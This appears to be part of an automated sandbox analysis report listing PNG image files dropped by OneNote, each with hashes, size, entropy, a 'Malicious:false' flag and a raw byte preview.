                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
